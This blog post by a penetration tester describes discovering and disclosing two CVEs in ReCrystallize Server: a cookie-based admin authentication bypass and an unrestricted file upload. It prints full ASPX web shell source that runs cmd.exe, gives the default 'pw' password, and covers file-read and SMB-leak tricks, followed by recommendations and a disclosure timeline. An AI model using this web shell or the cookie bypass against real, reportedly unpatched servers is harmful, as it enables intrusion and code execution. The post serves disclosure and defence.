TL&DR – While on an assessment, I found an instance of ReCrystallize Server. It had many problems, some of which had to do with insufficient hardening on the client’s side while others were new vulnerabilities I found that when chained together, achieve Remote Code Execution (RCE). These vulnerabilities were disclosed to ReCrystallize Software and MITRE.
Besides the disclosed vulnerabilities, some “features” were also used for malicious purposes. The replication and validation of the findings were done on my own test environment.
This blog post was made public despite that there is no patch available (as far as I am aware of) due to a lack of reply from the vendor after multiple interactions.
Hunting for vulnerabilities
This blog post tells the tale of finding two vulnerabilities in ReCrystallize Server software. It started with a web application assessment that was not special in any way. The application in scope was meant for internal use only and the core application was kind of boring. This changed when the application threw some errors when I tried to print a report. Looking at the error is where the fun began!
The error showed that third-party software was used for printing reports. The third-party software was ‘ReCrystallize Server’ and was a standalone application.
I had never heard of this software before and assumed it had something to do with SAP Crystal Reports. From here, I could follow the road in 2 directions. The one direction was to read the documentation and find known vulnerabilities for this software, and the other direction was to hit the login and see what would happen. My curiosity was triggered, so I just smashed the Log In button.
Credentials like ‘admin/admin’ or ‘admin/password’ did not work, so back to direction number one. Let’s look for known vulnerabilities.
The first hit was a bit misleading as the subject was not about vulnerabilities. Are there any known CVEs perhaps?
It seems that this application is completely secure. As it often happens on assessments, I was short on time. So, let’s skip it right?
In the image above you see a search result referring to an installation guide. Perhaps some juicy information is disclosed in there, so I decided to have a look. This was not a wrong decision!
Ok… My short list with default passwords did not work at first, but surely the password is not really ‘pw’? It actually was.
System Info, Settings, Manage Files…. I can smell it already, an over privileged process probably! The first thing I could think about was uploading a web shell within ‘Manage Files’. Unfortunately, the functionality was not working since there was no license present. Next would be ‘System Info’ to gather some information about the system.
Let’s have a look at what could be important. Based on this information we know that the application runs on the system drive (C:). This is useful to know for command execution payloads or Local File Inclusion (LFI) vulnerabilities. The process is running as ‘NT AUTHORITY\SYSTEM’, which is a local account with the highest privileges. We also now know where ReCrystallize Server is installed and therefore would be able to find out where files are going to be stored. In this example you are also able to see that the server is domain joined (no this is not a client domain as I made an effort to set up a lab environment).
You might remember the ‘Settings’ button being present as an administrator function. A lot of options were present under settings such as configuring database credentials, configuring SMTP server settings, etc. None of them were configured, but I wanted to highlight one setting.
As the admin user, I was able to allow the use of absolute paths. This seemed like an important setting for me, but later in this post you will find out that it really is not. This looks like the start of Local File Inclusion.
The installation manual I mentioned earlier showed this:
Apparently, the application can view the contents of a folder specified in the ‘folderName’ parameter. Since I allowed absolute paths, let’s see the functionality in action.
Sweet, I can see the contents of ‘C:\Program Files (x86)’. I just wished there was a way to get the files instead of folders. While playing around with the application and crawling through the manual, I was able to download files from the server.
I exploited this a bit to get access to network shares, extract information regarding the associated Active Directory environment and got database credentials.
Although I was not able to upload a web shell, I was happy with it and ready to notify the client. As if it was written in the almighty guidelines of system administrators, the reaction was:
“You were only able to do that because we did not configure it. After hardening the configuration, this would not be possible anymore”
Hmm, challenge accepted then. The next morning, I was able to retest the findings on the ‘hardened’ configuration of ReCrystallize Server.
For the ones that watched Top Gear with James May, “Bollocks”! The default password was of course changed, the use of absolute paths was disabled. This shouldn’t be happening!
CVE-2024-26331
Luckily, I took a note of some strange behaviour before the client reconfigured the ReCrystallize Server. On some occasions, the session of the core application expired but I was able to continue in the third-party software ReCrystallize Server. I also noted a cookie being set only for ReCrystallize Server, namely ‘AdminUsername=admin’.
Let’s try to access the admin functionality without and with the cookie being set.
Nice, I have administrative access again!
CVE-2024-28269
With a license now present, it was possible to use the ‘Manage Files’ feature. This happened to be a way to upload files without restrictions. Unrestricted File Upload? Let’s get RCE!
Uploading a default ASPX web shell would probably raise an alert. We could do obfuscation and all other kinds of tricks. Instead, I wanted to keep things simple when I searched for an appropriate web shell on the Internet. I created 2 files, report.aspx and report.aspx.cs, where accessing report.aspx would execute the code in Report.aspx.cs. In this case I simply executed the systeminfo command.
Content of report.aspx:
<%@ Page Language="C#" AutoEventWireup="true" CodeFile="report.aspx.cs" Inherits="Report.Template" %>
<!DOCTYPE html>
<html>
<head>
<title>Report Template</title>
</head>
<body>
<h1>Report Results:</h1>
<pre><asp:Literal runat="server" ID="ReportOutput" EnableViewState="false" /></pre>
</body>
</html>Content report.aspx.cs:
using System;
using System.Diagnostics;
namespace Report
{
public partial class Template : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
// Set up process info
var processStartInfo = new ProcessStartInfo
{
FileName = "cmd.exe",
Arguments = "/c systeminfo", // Replace with your desired target
RedirectStandardOutput = true,
UseShellExecute = false,
CreateNoWindow = true
};
// Start the process
using (var process = new Process { StartInfo = processStartInfo })
{
process.Start();
string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();
// Display the output on the web page
ReportOutput.Text = output;
}
}
}
}The image below shows the result of calling report.aspx.
This was extremely fun, and the client was happy and amazed with the results. The fact that I only needed to place a specific cookie blew their mind. In agreement with the client, I disclosed the vulnerability to ReCrystallize Software.
Side quests
As mentioned in the beginning, there are some “features” that could be abused. An example was already given, namely the retrieval of files using absolute paths. Multiple parameters could be used for calling UNC paths, even when the tick-box regarding the use of absolute paths is turned off. An SMB request was sent out to my attacker system running Responder.
The request shown above was executed while not being unauthenticated. It also turned out that the download of files could have been done unauthenticated…
Even when the usage of absolute paths is disabled, you could still get the files. Below is just an example of a way to download system files without authentication.
The image below shows that it is also still possible to send an outbound SMB request.
Recommendations
There is a lot that can be said about this software. In general, ReCrystallize Software should patch the issues mentioned above. As you’d see in the disclosure timeline, that did not go as well as one would hope for, and two years later there still is no formal patch these issues. In the meantime, if you need this application, you should isolate the server /service as much as possible making it only available to users who need it.
When a patch is available, the application itself should be hardened by making sure that absolute paths are not allowed, the default password is changed and encryption is turned on.
Also, do not forget to harden the underlying web server by keeping it up-to-date and making sure the principle of least privilege principle is applied. It is also recommended that you block outbound SMB traffic.
Disclosure Timeline
General note: Due to the pandemic and the amount of other work, the disclosure timeline is a bit lengthier than I wanted. I also learned that requesting a CVE should have been done earlier..
08-09-2022 – Disclosure of authentication bypass and unrestricted file upload vulnerabilities to ReCrystallize Software.
12-09-2022 – Vulnerabilities were accepted by ReCrystallize Software, expected patch in the next major release.
15-11-2022 – Expected patch date moved to December 2022 or January 2023.
01-03-2023 – Requested a status update, but no response.
10-07-2023 – Requested a status update, but no response.
15-02-2024 – Requested a CVE from MITRE for the authentication bypass.
19-02-2024 – CVE-2024-26331 was reserved.
19-02-2024 – Notified ReCrystallize Software about the reserved CVE and upcoming publication.
19-02-2024 – Request to MITRE to add another CVE for the Unrestricted File Upload.
14-03-2024 – CVE-2024-28269 was reserved.
14-03-2024 – Notified ReCrystallize Software about the reserved CVE and a reminder about publication.
14-03-2024 – Notified an organization that had an instance of ReCrystallize Server available online.